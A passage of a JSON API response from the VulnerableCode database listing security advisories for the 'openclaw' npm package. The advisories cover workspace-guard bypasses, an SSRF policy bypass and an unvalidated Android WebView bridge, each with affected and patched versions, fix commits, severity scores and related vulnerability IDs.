"VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28" } ], "aliases": [ "GHSA-8j7f-g9gv-7jhc" ], "risk_score": 3.4, "exploitability": "0.5", "weighted_severity": "6.7", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-mggy-bv5s-5uax" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89450?format=api", "vulnerability_id": "VCID-mszk-dr24-xugw", "summary": "OpenClaw: screen_record outPath bypassed workspace-only filesystem guard\n## Summary\n\nscreen_record outPath bypassed workspace-only filesystem guard.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.10`\n- Patched versions: `>= 2026.4.10`\n\n## Impact\n\nThe node-host screen recording tool could honor an `outPath` outside the workspace guard, allowing an authorized tool call to write outside the intended workspace boundary.\n\n## Technical Details\n\nThe fix applies the workspace-root guard to node tool `outPath` handling, including screen recording paths.\n\n## Fix\n\nThe issue was fixed in #63551. The first stable tag containing the fix is `v2026.4.10`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `635bb35b68d8faa5bfa2fda35feadd315122748a`\n- PR: #63551\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.10 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @anshumanbh for reporting this issue.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-43567", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00029", "scoring_system": "epss", "scoring_elements": "0.08891", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00034", "scoring_system": "epss", "scoring_elements": "0.10398", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00034", "scoring_system": "epss", "scoring_elements": "0.1044", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-43567" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/635bb35b68d8faa5bfa2fda35feadd315122748a", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-05T13:49:42Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/635bb35b68d8faa5bfa2fda35feadd315122748a" }, { "reference_url": "https://github.com/openclaw/openclaw/pull/63551", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/pull/63551" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-jf25-7968-h2h5", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-05T13:49:42Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-jf25-7968-h2h5" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43567", "reference_id": "CVE-2026-43567", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43567" }, { "reference_url": "https://github.com/advisories/GHSA-jf25-7968-h2h5", "reference_id": "GHSA-jf25-7968-h2h5", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-jf25-7968-h2h5" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-path-traversal-in-screen-record-outpath-parameter", "reference_id": "openclaw-path-traversal-in-screen-record-outpath-parameter", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" }, { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-05T13:49:42Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-path-traversal-in-screen-record-outpath-parameter" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109896?format=api", "purl": "pkg:npm/openclaw@2026.4.10", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-6cfj-zugb-7uhq" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-h9a4-1twb-d7d1" }, { "vulnerability": "VCID-hphn-8fnj-qkh2" }, { "vulnerability": "VCID-hy24-6xpe-pkb7" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-q3a2-qk5j-1yat" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2yd-uw91-9yck" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.10" } ], "aliases": [ "CVE-2026-43567", "GHSA-jf25-7968-h2h5" ], "risk_score": 3.2, "exploitability": "0.5", "weighted_severity": "6.4", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-mszk-dr24-xugw" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90208?format=api", "vulnerability_id": "VCID-mv8b-cryt-u3g8", "summary": "OpenClaw: Feishu docx upload_file/upload_image Bypasses Workspace-Only Filesystem Policy (GHSA-qf48-qfv4-jjm9 Incomplete Fix)\n## Impact\n\nFeishu docx upload_file/upload_image Bypasses Workspace-Only Filesystem Policy (GHSA-qf48-qfv4-jjm9 Incomplete Fix).\n\nFeishu document uploads could read local files outside the workspace-only file policy when processing docx upload blocks.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<=2026.4.3`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @Rosayxy for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41911", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00061", "scoring_system": "epss", "scoring_elements": "0.19277", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00061", "scoring_system": "epss", "scoring_elements": "0.19229", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00061", "scoring_system": "epss", "scoring_elements": "0.19273", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41911" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "2.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-5fc7-f62m-8983", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "LOW", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "2.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T14:39:00Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-5fc7-f62m-8983" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41911", "reference_id": "CVE-2026-41911", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41911" }, { "reference_url": "https://github.com/advisories/GHSA-5fc7-f62m-8983", "reference_id": "GHSA-5fc7-f62m-8983", "reference_type": "", "scores": [ { "value": "LOW", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-5fc7-f62m-8983" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-workspace-only-filesystem-policy-bypass-via-docx-upload-file-upload-image", "reference_id": "openclaw-workspace-only-filesystem-policy-bypass-via-docx-upload-file-upload-image", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T14:39:00Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-workspace-only-filesystem-policy-bypass-via-docx-upload-file-upload-image" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109872?format=api", "purl": "pkg:npm/openclaw@2026.4.8", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2g7x-vu14-nkde" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dqb2-dej7-augt" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-h9a4-1twb-d7d1" }, { "vulnerability": "VCID-hy24-6xpe-pkb7" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w2yd-uw91-9yck" }, { "vulnerability": "VCID-wyat-1259-2kg9" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8" } ], "aliases": [ "CVE-2026-41911", "GHSA-5fc7-f62m-8983" ], "risk_score": 3.0, "exploitability": "0.5", "weighted_severity": "5.9", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-mv8b-cryt-u3g8" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89740?format=api", "vulnerability_id": "VCID-mxu5-yjqs-nuap", "summary": "OpenClaw: Existing-session browser interaction routes bypassed SSRF policy enforcement\n## Summary\n\nExisting-session browser interaction routes bypassed SSRF policy enforcement.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.10`\n- Patched versions: `>= 2026.4.10`\n\n## Impact\n\nExisting-session browser interaction routes could continue interacting with or navigating targets without applying the same SSRF navigation guard used by guarded browser routes.\n\n## Technical Details\n\nThe fix guards existing-session navigation and interaction routes with browser navigation policy checks.\n\n## Fix\n\nThe issue was fixed in #64370. The first stable tag containing the fix is `v2026.4.10`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `daeb74920d5ad986cb600625180037e23221e93a`\n- PR: #64370\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.10 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @zsxsoft, with sponsorship from @KeenSecurityLab and @qclawer for reporting this issue.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-43573", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00031", "scoring_system": "epss", "scoring_elements": "0.09559", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00036", "scoring_system": "epss", "scoring_elements": "0.11153", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00036", "scoring_system": "epss", "scoring_elements": "0.11187", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-43573" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/daeb74920d5ad986cb600625180037e23221e93a", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" }, { "value": "4.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-05T13:49:59Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/daeb74920d5ad986cb600625180037e23221e93a" }, { "reference_url": "https://github.com/openclaw/openclaw/pull/64370", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/pull/64370" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-527m-976r-jf79", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "4.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-05T13:49:59Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-527m-976r-jf79" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43573", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43573" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-ssrf-policy-bypass-in-existing-session-browser-interaction-routes", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" }, { "value": "4.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-05T13:49:59Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-ssrf-policy-bypass-in-existing-session-browser-interaction-routes" }, { "reference_url": "https://github.com/advisories/GHSA-527m-976r-jf79", "reference_id": "GHSA-527m-976r-jf79", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-527m-976r-jf79" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109896?format=api", "purl": "pkg:npm/openclaw@2026.4.10", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-6cfj-zugb-7uhq" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-h9a4-1twb-d7d1" }, { "vulnerability": "VCID-hphn-8fnj-qkh2" }, { "vulnerability": "VCID-hy24-6xpe-pkb7" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-q3a2-qk5j-1yat" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2yd-uw91-9yck" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.10" } ], "aliases": [ "CVE-2026-43573", "GHSA-527m-976r-jf79" ], "risk_score": 3.5, "exploitability": "0.5", "weighted_severity": "6.9", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-mxu5-yjqs-nuap" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91810?format=api", "vulnerability_id": "VCID-nf6w-v1pc-mbe5", "summary": "OpenClaw: Arbitrary code execution via unvalidated WebView JavascriptInterface\n## Summary\nAndroid Canvas WebView pages from untrusted origins could invoke the JavascriptInterface bridge and inject instructions into the app.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `8b02ef133275be96d8aac2283100016c8a7f32e5`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- apps/android/app/src/main/java/ai/openclaw/app/ui/CanvasScreen.kt now snapshots page origin and rejects untrusted bridge calls.\n- apps/android/app/src/main/java/ai/openclaw/app/node/CanvasActionTrust.kt centralizes trusted origin and path validation for the bridge.\n\nOpenClaw thanks @cyjhhh for 